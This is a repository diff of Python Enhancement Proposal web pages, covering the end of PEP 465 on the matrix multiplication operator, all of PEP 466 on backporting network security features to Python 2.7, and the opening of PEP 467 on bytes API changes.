We do not – for now – define a __matmul__ method on the standard +memoryview or array.array objects, for several reasons. Of +course this could be added if someone wants it, but these types would +require quite a bit of additional work beyond __matmul__ before +they could be used for numeric work – e.g., they have no way to do +addition or scalar multiplication either! – and adding such +functionality is beyond the scope of this PEP. In addition, providing +a quality implementation of matrix multiplication is highly +non-trivial. Naive nested loop implementations are very slow and +shipping such an implementation in CPython would just create a trap +for users. But the alternative – providing a modern, competitive +matrix multiply – would require that CPython link to a BLAS library, +which brings a set of new complications. In particular, several +popular BLAS libraries (including the one that ships by default on +OS X) currently break the use of multiprocessing [8]. +Together, these considerations mean that the cost/benefit of adding +__matmul__ to these types just isn’t there, so for now we’ll +continue to delegate these problems to numpy and friends, and defer a +more systematic solution to a future proposal.

+

There are also non-numeric Python builtins which define __mul__ +(str, list, …). We do not define __matmul__ for these +types either, because why would we even do that.

+
+
+

Non-definition of matrix power

+

Earlier versions of this PEP also proposed a matrix power operator, +@@, analogous to **. But on further consideration, it was +decided that the utility of this was sufficiently unclear that it +would be better to leave it out for now, and only revisit the issue if +– once we have more experience with @ – it turns out that @@ +is truly missed. [14]

+
+
+
+

Rejected alternatives to adding a new operator

+

Over the past few decades, the Python numeric community has explored a +variety of ways to resolve the tension between matrix and elementwise +multiplication operations. PEP 211 and PEP 225, both proposed in 2000 +and last seriously discussed in 2008 [9], were early +attempts to add new operators to solve this problem, but suffered from +serious flaws; in particular, at that time the Python numerical +community had not yet reached consensus on the proper API for array +objects, or on what operators might be needed or useful (e.g., PEP 225 +proposes 6 new operators with unspecified semantics). Experience +since then has now led to consensus that the best solution, for both +numeric Python and core Python, is to add a single infix operator for +matrix multiply (together with the other new operators this implies +like @=).

+

We review some of the rejected alternatives here.

+

Use a second type that defines __mul__ as matrix multiplication: +As discussed above (Background: What’s wrong with the status quo?), +this has been tried for many years via the numpy.matrix type +(and its predecessors in Numeric and numarray). The result is a +strong consensus among both numpy developers and developers of +downstream packages that numpy.matrix should essentially never be +used, because of the problems caused by having conflicting duck types +for arrays. (Of course one could then argue we should only define +__mul__ to be matrix multiplication, but then we’d have the same +problem with elementwise multiplication.) There have been several +pushes to remove numpy.matrix entirely; the only counter-arguments +have come from educators who find that its problems are outweighed by +the need to provide a simple and clear mapping between mathematical +notation and code for novices (see Transparent syntax is especially +crucial for non-expert programmers). But, of course, starting out +newbies with a dispreferred syntax and then expecting them to +transition later causes its own problems. The two-type solution is +worse than the disease.

+

Add lots of new operators, or add a new generic syntax for defining +infix operators: In addition to being generally un-Pythonic and +repeatedly rejected by BDFL fiat, this would be using a sledgehammer +to smash a fly. The scientific python community has consensus that +adding one operator for matrix multiplication is enough to fix the one +otherwise unfixable pain point. (In retrospect, we all think PEP 225 +was a bad idea too – or at least far more complex than it needed to +be.)

+

Add a new @ (or whatever) operator that has some other meaning in +general Python, and then overload it in numeric code: This was the +approach taken by PEP 211, which proposed defining @ to be the +equivalent of itertools.product. The problem with this is that +when taken on its own terms, it’s pretty clear that +itertools.product doesn’t actually need a dedicated operator. It +hasn’t even been deemed worthy of being a builtin. (During discussions of +this PEP, a similar suggestion was made to define @ as a general +purpose function composition operator, and this suffers from the same +problem; functools.compose isn’t even useful enough to exist.) +Matrix multiplication has a uniquely strong rationale for inclusion as +an infix operator. There almost certainly don’t exist any other +binary operations that will ever justify adding any other infix +operators to Python.

+

Add a .dot method to array types so as to allow “pseudo-infix” +A.dot(B) syntax: This has been in numpy for some years, and in many +cases it’s better than dot(A, B). But it’s still much less readable +than real infix notation, and in particular still suffers from an +extreme overabundance of parentheses. See Why should matrix +multiplication be infix? above.
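
For illustration, here is the same quadratic form written both ways (a sketch assuming numpy; H, V, beta and r are just randomly generated stand-ins):

import numpy as np
from numpy.linalg import inv

rng = np.random.default_rng(0)
H = rng.standard_normal((3, 4))
V = rng.standard_normal((4, 4))
V = V @ V.T                      # make V symmetric positive definite
beta = rng.standard_normal(4)
r = rng.standard_normal(3)

# "pseudo-infix" method chaining:
S1 = (H.dot(beta) - r).T.dot(inv(H.dot(V).dot(H.T))).dot(H.dot(beta) - r)
# real infix notation:
S2 = (H @ beta - r).T @ inv(H @ V @ H.T) @ (H @ beta - r)
assert np.isclose(S1, S2)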

+

Use a ‘with’ block to toggle the meaning of * within a single code +block: E.g., numpy could define a special context object so that +we’d have:

+
c = a * b   # element-wise multiplication
+with numpy.mul_as_dot:
+    c = a * b  # matrix multiplication
+
+
+

However, this has two serious problems: first, it requires that every +array-like type’s __mul__ method know how to check some global +state (numpy.mul_is_currently_dot or whatever). This is fine if +a and b are numpy objects, but the world contains many +non-numpy array-like objects. So this either requires non-local +coupling – every numpy competitor library has to import numpy and +then check numpy.mul_is_currently_dot on every operation – or +else it breaks duck-typing, with the above code doing radically +different things depending on whether a and b are numpy +objects or some other sort of object. Second, and worse, with +blocks are dynamically scoped, not lexically scoped; i.e., any +function that gets called inside the with block will suddenly find +itself executing inside the mul_as_dot world, and crash and burn +horribly – if you’re lucky. So this is a construct that could only +be used safely in rather limited cases (no function calls), and which +would make it very easy to shoot yourself in the foot without warning.
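
A sketch of the second problem (hypothetical names throughout; nothing like mul_as_dot actually exists in numpy): a helper function written with elementwise * in mind silently changes behaviour when called from inside the block.

from contextlib import contextmanager

_mul_is_dot = False              # the hypothetical global state

@contextmanager
def mul_as_dot():
    global _mul_is_dot
    _mul_is_dot = True
    try:
        yield
    finally:
        _mul_is_dot = False

class FakeArray:
    def __mul__(self, other):
        # every array-like type would have to check the global flag
        return "matrix product" if _mul_is_dot else "elementwise product"

def innocent_helper(a, b):
    # written elsewhere, assuming * means elementwise multiplication
    return a * b

a, b = FakeArray(), FakeArray()
print(innocent_helper(a, b))      # elementwise product
with mul_as_dot():
    print(innocent_helper(a, b))  # matrix product -- silent behaviour change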

+

Use a language preprocessor that adds extra numerically-oriented +operators and perhaps other syntax: (As per recent BDFL suggestion: +[1]) This suggestion seems based on the idea that +numerical code needs a wide variety of syntax additions. In fact, +given @, most numerical users don’t need any other operators or +syntax; it solves the one really painful problem that cannot be solved +by other means, and that causes painful reverberations through the +larger ecosystem. Defining a new language (presumably with its own +parser which would have to be kept in sync with Python’s, etc.), just +to support a single binary operator, is neither practical nor +desirable. In the numerical context, Python’s competition is +special-purpose numerical languages (Matlab, R, IDL, etc.). Compared +to these, Python’s killer feature is exactly that one can mix +specialized numerical code with code for XML parsing, web page +generation, database access, network programming, GUI libraries, and +so forth, and we also gain major benefits from the huge variety of +tutorials, reference material, introductory classes, etc., which use +Python. Fragmenting “numerical Python” from “real Python” would be a +major source of confusion. A major motivation for this PEP is to +reduce fragmentation. Having to set up a preprocessor would be an +especially prohibitive complication for unsophisticated users. And we +use Python because we like Python! We don’t want +almost-but-not-quite-Python.

+

Use overloading hacks to define a “new infix operator” like *dot*, +as in a well-known Python recipe: (See: [2]) Beautiful is +better than ugly. This is… not beautiful. And not Pythonic. And +especially unfriendly to beginners, who are just trying to wrap their +heads around the idea that there’s a coherent underlying system behind +these magic incantations that they’re learning, when along comes an +evil hack like this that violates that system, creates bizarre error +messages when accidentally misused, and whose underlying mechanisms +can’t be understood without deep knowledge of how object oriented +systems work.
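
The flavour of the recipe in question, sketched minimally (not the exact published recipe): an object whose __rmul__ and __mul__ overloads make a *dot* b parse as (a * dot) * b.

class Infix:
    def __init__(self, func):
        self.func = func
    def __rmul__(self, left):            # handles "a * dot"
        return Infix(lambda right: self.func(left, right))
    def __mul__(self, right):            # handles "(a * dot) * b"
        return self.func(right)

dot = Infix(lambda a, b: sum(x * y for x, y in zip(a, b)))
print([1, 2, 3] *dot* [4, 5, 6])         # 32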

+

Use a special “facade” type to support syntax like arr.M * arr: +This is very similar to the previous proposal, in that the .M +attribute would basically return the same object as arr *dot would, +and thus suffers the same objections about ‘magicalness’. This +approach also has some non-obvious complexities: for example, while +arr.M * arr must return an array, arr.M * arr.M and +arr * arr.M must return facade objects, or else arr.M * arr.M * arr +and arr * arr.M * arr will not work. But this means that facade +objects must be able to recognize both other array objects and other +facade objects (which creates additional complexity for writing +interoperating array types from different libraries who must now +recognize both each other’s array types and their facade types). It +also creates pitfalls for users who may easily type arr * arr.M or +arr.M * arr.M and expect to get back an array object; instead, +they will get a mysterious object that throws errors when they attempt +to use it. Basically with this approach users must be careful to +think of .M* as an indivisible unit that acts as an infix operator +– and as infix-operator-like token strings go, at least *dot* +is prettier looking (look at its cute little ears!).

+
+
+

Discussions of this PEP

+

Collected here for reference:

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0465.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0466/index.html b/pep-0466/index.html new file mode 100644 index 00000000000..e0ed4510e43 --- /dev/null +++ b/pep-0466/index.html @@ -0,0 +1,743 @@ + + + + + + + + PEP 466 – Network Security Enhancements for Python 2.7.x | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 466 – Network Security Enhancements for Python 2.7.x

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Mar-2014
+
Python-Version:
+
2.7.9
+
Post-History:
+
23-Mar-2014, 24-Mar-2014, 25-Mar-2014, 26-Mar-2014, 16-Apr-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Most CPython tracker issues are classified as errors in behaviour or +proposed enhancements. Most patches to fix behavioural errors are +applied to all active maintenance branches. Enhancement patches are +restricted to the default branch that becomes the next Python version.

+

This cadence works reasonably well during Python’s normal 18-24 month +feature release cycle, which is still applicable to the Python 3 series. +However, the age of the standard library in Python 2 has now reached a point +where it is sufficiently far behind the state of the art in network security +protocols for it to be causing real problems in use cases where upgrading to +Python 3 in the near term may not be feasible.

+

In recognition of the additional practical considerations that have arisen +during the 4+ year maintenance cycle for Python 2.7, this PEP allows a +critical set of network security related features to be backported from +Python 3.4 to upcoming Python 2.7.x maintenance releases.

+

While this PEP does not make any changes to the core development team’s +handling of security-fix-only branches that are no longer in active +maintenance, it does recommend that commercial redistributors providing +extended support periods for the Python standard library either backport +these features to their supported versions, or else explicitly disclaim +support for the use of older versions in roles that involve connecting +directly to the public internet.

+
+ +
+

Implementation status

+

This PEP originally proposed adding all listed features to the Python 2.7.7 +maintenance release. That approach proved to be too ambitious given the +limited time frame between the original creation and acceptance of the PEP +and the release of Python 2.7.7rc1. Instead, the progress of each individual +accepted feature backport is being tracked as an independent enhancement +targeting Python 2.7.

+

Implemented for Python 2.7.7:

+ +

Implemented for Python 2.7.8:

+ +

Implemented for Python 2.7.9 (in development):

+
    +
  • Issue #21308: backport specified ssl module features
  • +
  • Issue #21307: backport remaining specified hashlib module features
  • +
  • Issue #21305: backport os.urandom shared file descriptor change
  • +
+
+
+

Backwards compatibility considerations

+

As in the Python 3 series, the backported ssl.create_default_context() +API is granted a backwards compatibility exemption that permits the +protocol, options, cipher and other settings of the created SSL context to +be updated in maintenance releases to use higher default security settings. +This allows them to appropriately balance compatibility and security at the +time of the maintenance release, rather than at the time of the original +feature release.

+

This PEP does not grant any other exemptions to the usual backwards +compatibility policy for maintenance releases. Instead, by explicitly +encouraging the use of feature based checks, it is designed to make it easier +to write more secure cross-version compatible Python software, while still +limiting the risk of breaking currently working software when upgrading to +a new Python 2.7 maintenance release.

+

In all cases where this proposal allows new features to be backported to +the Python 2.7 release series, it is possible to write cross-version +compatible code that operates by “feature detection” (for example, checking +for particular attributes in a module), without needing to explicitly check +the Python version.

+

It is then up to library and framework code to provide an appropriate warning +and fallback behaviour if a desired feature is found to be missing. While +some especially security sensitive software MAY fail outright if a desired +security feature is unavailable, most software SHOULD instead emit a warning +and continue operating using a slightly degraded security configuration.
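
A sketch of that feature-detection pattern (the helper name is made up for illustration): probe for the backported API by attribute rather than by version number, and degrade with a warning when it is missing.

import ssl
import warnings

def make_client_context():
    if hasattr(ssl, "create_default_context"):
        return ssl.create_default_context()
    # Older maintenance release: warn and let the caller fall back to
    # the legacy ssl.wrap_socket() behaviour.
    warnings.warn("ssl.create_default_context() unavailable; "
                  "continuing with a degraded security configuration")
    return None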

+

The backported APIs allow library and application code to perform the +following actions after detecting the presence of a relevant +network security related feature:

+
    +
  • explicitly opt in to more secure settings (to allow the use of enhanced +security features in older maintenance releases of Python with less +secure default behaviour)
  • +
  • explicitly opt in to less secure settings (to allow the use of newer Python +feature releases in lower security environments)
  • +
  • determine the default setting for the feature (this MAY require explicit +Python version checks to determine the Python feature release, but DOES +NOT require checking for a specific maintenance release)
  • +
+

Security related changes to other modules (such as higher level networking +libraries and data format processing libraries) will continue to be made +available as backports and new modules on the Python Package Index, as +independent distribution remains the preferred approach to handling +software that must continue to evolve to handle changing development +requirements independently of the Python 2 standard library. Refer to +the Motivation and Rationale section for a review of the characteristics +that make the secure networking infrastructure worthy of special +consideration.

+
+

OpenSSL compatibility

+

Under this proposal, OpenSSL may be upgraded to more recent feature releases +in Python 2.7 maintenance releases. On Linux and most other POSIX systems, +the specific version of OpenSSL used already varies, as CPython dynamically +links to the system provided OpenSSL library by default.

+

For the Windows binary installers, the _ssl and _hashlib modules are +statically linked with OpenSSL and the associated symbols are not exported. +Marc-Andre Lemburg indicates that updating to newer OpenSSL releases in the +egenix-pyopenssl binaries has not resulted in any reported compatibility +issues [3].

+

The Mac OS X binary installers historically followed the same policy as +other POSIX installations and dynamically linked to the Apple provided +OpenSSL libraries. However, Apple has now ceased updating these +cross-platform libraries, instead requiring that even cross-platform +developers adopt Mac OS X specific interfaces to access up to date security +infrastructure on their platform. Accordingly, and independently of this +PEP, the Mac OS X binary installers were already going to be switched to +statically linking newer versions of OpenSSL [4].

+
+
+
+

Other Considerations

+
+

Maintainability

+

A number of developers, including Alex Gaynor and Donald Stufft, have +expressed interest in carrying out the feature backports covered by this +policy, and assisting with any additional maintenance burdens that arise +in the Python 2 series as a result.

+

Steve Dower and Brian Curtin have offered to help with the creation of the +Windows installers, allowing Martin von Löwis the opportunity to step back +from the task of maintaining the 2.7 Windows installer.

+

This PEP is primarily about establishing the consensus needed to allow them +to carry out this work. For other core developers, this policy change +shouldn’t impose any additional effort beyond potentially reviewing the +resulting patches for those developers specifically interested in the +affected modules.

+
+
+

Security releases

+

This PEP does not propose any changes to the handling of security +releases - those will continue to be source only releases that +include only critical security fixes.

+

However, the recommendations for library and application developers are +deliberately designed to accommodate commercial redistributors that choose +to apply these changes to additional Python release series that are either +in security fix only mode, or have been declared “end of life” by the core +development team.

+

Whether or not redistributors choose to exercise that option will be up +to the individual redistributor.

+
+
+

Integration testing

+

Third party integration testing services should offer users the ability +to test against multiple Python 2.7 maintenance releases (at least 2.7.6 +and 2.7.7+), to ensure that libraries, frameworks and applications can still +test their handling of the legacy security infrastructure correctly (either +failing or degrading gracefully, depending on the security sensitivity of +the software), even after the features covered in this proposal have been +backported to the Python 2.7 series.

+
+
+

Handling lower security environments with low risk tolerance

+

For better or for worse (mostly worse), there are some environments where +the risk of latent security defects is more tolerated than even a slightly +increased risk of regressions in maintenance releases. This proposal largely +excludes these environments from consideration where the modules covered by +the exemption are concerned - this approach is entirely inappropriate for +software connected to the public internet, and defence in depth security +principles suggest that it is not appropriate for most private networks +either.

+

Downstream redistributors may still choose to cater to such environments, +but they will need to handle the process of downgrading the security +related modules and doing the associated regression testing themselves. +The main CPython continuous integration infrastructure will not cover this +scenario.

+
+
+
+

Motivation and Rationale

+

The creation of this PEP was prompted primarily by the aging SSL support in +the Python 2 series. As of March 2014, the Python 2.7 SSL module is +approaching four years of age, and the SSL support in the still popular +Python 2.6 release had its feature set locked six years ago.

+

These are simply too old to provide a foundation that can be recommended +in good conscience for secure networking software that operates over the +public internet, especially in an era where it is becoming quite clearly +evident that advanced persistent security threats are even more widespread +and more indiscriminate in their targeting than had previously been +understood. While they represented reasonable security infrastructure in +their time, the state of the art has moved on, and we need to investigate +mechanisms for effectively providing more up to date network security +infrastructure for users that, for whatever reason, are not currently in +a position to migrate to Python 3.

+

While the use of the system OpenSSL installation addresses many of these +concerns on Linux platforms, it doesn’t address all of them (in particular, +it is still difficult for software to explicitly require some higher level +security settings). The standard library support can be bypassed by using a +third party library like PyOpenSSL or Pycurl, but this still results in a +security problem, as these can be difficult dependencies to deploy, and many +users will remain unaware that they might want them. Rather than explaining +to potentially naive users how to obtain and use these libraries, it seems +better to just fix the included batteries.

+

In the case of the binary installers for Windows and Mac OS X that are +published on python.org, the version of OpenSSL used is entirely within +the control of the Python core development team, but is currently limited +to OpenSSL maintenance releases for the version initially shipped with the +corresponding Python feature release.

+

With increased popularity comes increased responsibility, and this proposal +aims to acknowledge the fact that Python’s popularity and adoption is at a +sufficiently high level that some of our design and policy decisions have +significant implications beyond the Python development community.

+

As one example, the Python 2 ssl module does not support the Server +Name Indication standard. While it is possible to obtain SNI support +by using the third party requests client library, actually doing so +currently requires using not only requests and its embedded dependencies, +but also half a dozen or more additional libraries. The lack of support +in the Python 2 series thus serves as an impediment to making effective +use of SNI on servers, as Python 2 clients will frequently fail to handle +it correctly.

+

Another more critical example is the lack of SSL hostname matching in the +Python 2 standard library - it is currently necessary to rely on a third +party library, such as requests or backports.ssl_match_hostname to +obtain that functionality in Python 2.

+

The Python 2 series also remains more vulnerable to remote timing attacks +on security sensitive comparisons than the Python 3 series, as it lacks a +standard library equivalent to the timing attack resistant +hmac.compare_digest() function. While appropriate secure comparison +functions can be implemented in third party extensions, many users don’t +even consider the issue and use ordinary equality comparisons instead +- while a standard library solution doesn’t automatically fix that problem, +it does make the barrier to resolution much lower once the problem is +pointed out.
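
The pattern the backported function enables, as a brief sketch: replace ordinary equality on secrets with a comparison whose running time does not depend on where the inputs first differ.

import hmac

def check_signature(supplied, expected):
    # 'supplied == expected' can leak, via timing, how many leading
    # bytes match; compare_digest avoids that side channel.
    return hmac.compare_digest(supplied, expected)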

+

Python 2.7 represents the only long term maintenance release the core +development team has provided, and it is natural that there will be things +that worked over a historically shorter maintenance lifespan that don’t work +over this longer support period. In the specific case of the problem +described in this PEP, the simplest available solution is to acknowledge +that long term maintenance of network security related modules requires +the ability to add new features, even while retaining backwards compatibility +for existing interfaces.

+

For those familiar with it, it is worth comparing the approach described in +this PEP with Red Hat’s handling of its long term open source support +commitments: it isn’t the RHEL 6.0 release itself that receives 10 years +worth of support, but the overall RHEL 6 series. The individual RHEL 6.x +point releases within the series then receive a wide variety of new +features, including security enhancements, all while meeting strict +backwards compatibility guarantees for existing software. The proposal +covered in this PEP brings our approach to long term maintenance more into +line with this precedent - we retain our strict backwards compatibility +requirements, but make an exception to the restriction against adding new +features.

+

To date, downstream redistributors have respected our upstream policy of +“no new features in Python maintenance releases”. This PEP explicitly +accepts that a more nuanced policy is appropriate in the case of network +security related features, and the specific change it describes is +deliberately designed such that it is potentially suitable for Red Hat +Enterprise Linux and its downstream derivatives.

+
+

Why these particular changes?

+

The key requirement for a feature to be considered for inclusion in this +proposal was that it must have security implications beyond the specific +application that is written in Python and the system that application is +running on. Thus the focus on network security protocols, password storage +and related cryptographic infrastructure - Python is a popular choice for +the development of web services and clients, and thus the capabilities of +widely used Python versions have implications for the security design of +other services that may themselves be using newer versions of Python or +other development languages, but need to interoperate with clients or +servers written using older versions of Python.

+

The intent behind this requirement was to minimise any impact that the +introduction of this policy may have on the stability and compatibility of +maintenance releases, while still addressing some key security concerns +relating to the particular aspects of Python 2.7. It would be thoroughly +counterproductive if end users became as cautious about updating to new +Python 2.7 maintenance releases as they are about updating to new feature +releases within the same release series.

+

The ssl module changes are included in this proposal to bring the +Python 2 series up to date with the past 4 years of evolution in network +security standards, and make it easier for those standards to be broadly +adopted in both servers and clients. Similarly the hash algorithm +availability indicators in hashlib are included to make it easier for +applications to detect and employ appropriate hash definitions across both +Python 2 and 3.

+

The hmac.compare_digest() and hashlib.pbkdf2_hmac() functions are included to +help lower the barriers to secure password storage and checking in Python 2 +server applications.
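
Together they support the standard password-storage pattern, sketched here with illustrative parameter choices (the salt size and iteration count below are not prescribed by this PEP):

import hashlib
import hmac
import os

salt = os.urandom(16)
stored = hashlib.pbkdf2_hmac('sha256', b'correct horse', salt, 100000)

def verify(candidate):
    attempt = hashlib.pbkdf2_hmac('sha256', candidate, salt, 100000)
    return hmac.compare_digest(attempt, stored)

assert verify(b'correct horse')
assert not verify(b'wrong guess')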

+

The os.urandom() change has been included in this proposal to further +encourage users to leave the task of providing high quality random numbers +for cryptographic use cases to operating system vendors. The use of +insufficiently random numbers has the potential to compromise any +cryptographic system, and operating system developers have more tools +available to address that problem adequately than the typical Python +application runtime.

+
+
+

Rejected alternative: just advise developers to migrate to Python 3

+

This alternative represents the status quo. Unfortunately, it has proven +to be unworkable in practice, as the backwards compatibility implications +mean that this is a non-trivial migration process for large applications +and integration projects. While the tools for migration have evolved to +a point where it is possible to migrate even large applications +opportunistically and incrementally (rather than all at once) by updating +code to run in the large common subset of Python 2 and Python 3, using the +most recent technology often isn’t a priority in commercial environments.

+

Previously, this was considered an acceptable harm, as while it was an +unfortunate problem for the affected developers to have to face, it was +seen as an issue between them and their management chain to make the case +for infrastructure modernisation, and this case would become naturally +more compelling as the Python 3 series evolved.

+

However, now that we’re fully aware of the impact the limitations of the +Python 2 standard library may be having on the evolution of internet +security standards, I no longer believe that it is reasonable to expect +platform and application developers to resolve all of the latent defects +in an application’s Unicode correctness solely in order to gain access to +the network security enhancements already available in Python 3.

+

While Ubuntu (and to some extent Debian as well) are committed to porting all +default system services and scripts to Python 3, and to removing Python 2 +from its default distribution images (but not from its archives), this is +a mammoth task and won’t be completed for the Ubuntu 14.04 LTS release +(at least for the desktop image - it may be achieved for the mobile and +server images).

+

Fedora has even more work to do to migrate, and it will take a non-trivial +amount of time to migrate the relevant infrastructure components. While +Red Hat are also actively working to make it easier for users to use more +recent versions of Python on our stable platforms, it’s going to take time +for those efforts to start having an impact on end users’ choice of version, +and any such changes also don’t benefit the core platform infrastructure +that runs in the integrated system Python by necessity.

+

The OpenStack migration to Python 3 is also still in its infancy, and even +though that’s a project with an extensive and relatively robust automated +test suite, it’s still large enough that it is going to take quite some time +to migrate fully to a Python 2/3 compatible code base.

+

And that’s just three of the highest profile open source projects that +make heavy use of Python. Given the likely existence of large amounts of +legacy code that lacks the kind of automated regression test suite needed +to help support a migration from Python 2 to Python 3, there are likely to +be many cases where reimplementation (perhaps even in Python 3) proves +easier than migration. The key point of this PEP is that those situations +affect more people than just the developers and users of the affected +application: the existence of clients and servers with outdated network +security infrastructure becomes something that developers of secure +networked services need to take into account as part of their security +design, and that’s a problem that inhibits the adoption of better security +standards.

+

As Terry Reedy noted, if we try to persist with the status quo, the likely +outcome is that commercial redistributors will attempt to do something +like this on behalf of their customers anyway, but in a potentially +inconsistent and ad hoc manner. By drawing the scope definition process +into the upstream project we are in a better position to influence the +approach taken to address the situation and to help ensure some consistency +across redistributors.

+

The problem is real, so something needs to change, and this PEP describes +my preferred approach to addressing the situation.

+
+
+

Rejected alternative: create and release Python 2.8

+

With sufficient corporate support, it likely would be possible to create +and release Python 2.8 (it’s highly unlikely such a project would garner +enough interest to be achievable with only volunteers). However, this +wouldn’t actually solve the problem, as the aim is to provide a relatively +low impact way to incorporate enhanced security features into integrated +products and deployments that make use of Python 2.

+

Upgrading to a new Python feature release would mean both more work for the +core development team, as well as a more disruptive update that most +potential end users would likely just skip entirely.

+

Attempting to create a Python 2.8 release would also bring in suggestions +to backport many additional features from Python 3 (such as tracemalloc +and the improved coroutine support), making the migration from Python 2.7 +to this hypothetical 2.8 release even riskier and more disruptive.

+

This is not a recommended approach, as it would involve substantial +additional work for a result that is actually less effective in achieving +the original aim (which is to eliminate the current widespread use of the +aging network security infrastructure in the Python 2 series).

+

Furthermore, while I can’t make any commitments to actually addressing +this issue on Red Hat platforms, I can categorically rule out the idea +of a Python 2.8 being of any use to me in even attempting to get it +addressed.

+
+
+

Rejected alternative: distribute the security enhancements via PyPI

+

While this initially appears to be an attractive and easier to manage +approach, it actually suffers from several significant problems.

+

Firstly, this is complex, low level, cross-platform code that integrates +with the underlying operating system across a variety of POSIX platforms +(including Mac OS X) and Windows. The CPython BuildBot fleet is already set +up to handle continuous integration in that context, but most of the +freely available continuous integration services just offer Linux, and +perhaps paid access to Windows. Those services work reasonably well for +software that largely runs on the abstraction layers offered by Python and +other dynamic languages, as well as the more comprehensive abstraction +offered by the JVM, but won’t suffice for the kind of code involved here.

+

The OpenSSL dependency for the network security support also qualifies as +the kind of “complex binary dependency” that isn’t yet handled well by the +pip based software distribution ecosystem. Relying on a third party +binary dependency also creates potential compatibility problems for pip +when running on other interpreters like PyPy.

+

Another practical problem with the idea is the fact that pip itself +relies on the ssl support in the standard library (with some additional +support from a bundled copy of requests, which in turn bundles +backports.ssl_match_hostname), and hence would require any replacement +module to also be bundled within pip. This wouldn’t pose any +insurmountable difficulties (it’s just another dependency to vendor), but +it would mean yet another copy of OpenSSL to keep up to date.

+

This approach also has the same flaw as all other “improve security by +renaming things” approaches: they completely miss the users who most need +help, and raise significant barriers against being able to encourage users +to do the right thing when their infrastructure supports it (since +“use this other module” is a much higher impact change than “turn on this +higher security setting”). Deprecating the aging SSL infrastructure in the +standard library in favour of an external module would be even more user +hostile than accepting the slightly increased risk of regressions associated +with upgrading it in place.

+

Last, but certainly not least, this approach suffers from the same problem +as the idea of doing a Python 2.8 release: likely not solving the actual +problem. Commercial redistributors of Python are set up to redistribute +Python, and a pre-existing set of additional packages. Getting new +packages added to the pre-existing set can be done, but means approaching +each and every redistributor and asking them to update their +repackaging process accordingly. By contrast, the approach described in +this PEP would require redistributors to deliberately opt out of the +security enhancements by deliberately downgrading the provided network +security infrastructure, which most of them are unlikely to do.

+
+
+

Rejected variant: provide a “legacy SSL infrastructure” branch

+

Earlier versions of this PEP included the concept of a 2.7-legacy-ssl +branch that preserved the exact feature set of the Python 2.7.6 network +security infrastructure.

+

In my opinion, anyone that actually wants this is almost certainly making a +mistake, and if they insist they really do want it in their specific +situation, they’re welcome to either make it themselves or arrange for a +downstream redistributor to make it for them.

+

If they are made publicly available, any such rebuilds should be referred to +as “Python 2.7 with Legacy SSL” to clearly distinguish them from the official +Python 2.7 releases that include more up to date network security +infrastructure.

+

After the first Python 2.7 maintenance release that implements this PEP, it +would also be appropriate to refer to Python 2.7.6 and earlier releases as +“Python 2.7 with Legacy SSL”.

+
+
+

Rejected variant: synchronise particular modules entirely with Python 3

+

Earlier versions of this PEP suggested synchronising the hmac, +hashlib and ssl modules entirely with their Python 3 counterparts.

+

This approach proved too vague to build a compelling case for the exception, +and has thus been replaced by the current more explicit proposal.

+
+
+

Rejected variant: open ended backport policy

+

Earlier versions of this PEP suggested a general policy change related to +future Python 3 enhancements that impact the general security of the +internet.

+

That approach created unnecessary uncertainty, so it has been simplified to +propose backporting a specific concrete set of changes. Future feature +backport proposals can refer back to this PEP as precedent, but it will +still be necessary to make a specific case for each feature addition to +the Python 2.7 long-term support release.

+
+
+
+

Disclosure of Interest

+

The author of this PEP currently works for Red Hat on test automation tools. +If this proposal is accepted, I will be strongly encouraging Red Hat to take +advantage of the resulting opportunity to help improve the overall security +of the Python ecosystem. However, I do not speak for Red Hat in this matter, +and cannot make any commitments on Red Hat’s behalf.

+
+
+

Acknowledgements

+

Thanks to Christian Heimes and others for their efforts in greatly improving +Python’s SSL support in the Python 3 series, and to a variety of members of +the Python community for helping me to better understand the implications +of the default settings we provide in our SSL modules, and the impact that +tolerating the use of SSL infrastructure that was defined in 2010 +(Python 2.7) or even 2008 (Python 2.6) potentially has for the security +of the web as a whole.

+

Thanks to Donald Stufft and Alex Gaynor for identifying a more limited set +of essential security features that allowed the proposal to be made more +fine-grained than backporting entire modules from Python 3.4 ([7], [8]).

+

Christian and Donald also provided valuable feedback on a preliminary +draft of this proposal.

+

Thanks also to participants in the python-dev mailing list threads +([1], [2], [5], [6]), as well as the various folks I discussed this issue with at +PyCon 2014 in Montreal.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0466.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0467/index.html b/pep-0467/index.html new file mode 100644 index 00000000000..493fb015638 --- /dev/null +++ b/pep-0467/index.html @@ -0,0 +1,354 @@ + + + + + + + + PEP 467 – Minor API improvements for binary sequences | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 467 – Minor API improvements for binary sequences

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Ethan Furman <ethan at stoneleaf.us>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
30-Mar-2014
+
Python-Version:
+
3.13
+
Post-History:
+
30-Mar-2014, 15-Aug-2014, 16-Aug-2014, 07-Jun-2016, 01-Sep-2016, +13-Apr-2021, 03-Nov-2021, 27-Dec-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes small adjustments to the APIs of the bytes and +bytearray types to make it easier to operate entirely in the binary domain:

+
    +
  • Add fromsize alternative constructor
  • +
  • Add fromint alternative constructor
  • +
  • Add getbyte byte retrieval method
  • +
  • Add iterbytes alternative iterator
  • +
+
+
+

Rationale

+

During the initial development of the Python 3 language specification, the +core bytes type for arbitrary binary data started as the mutable type +that is now referred to as bytearray. Other aspects of operating in +the binary domain in Python have also evolved over the course of the Python +3 series, for example with PEP 461.

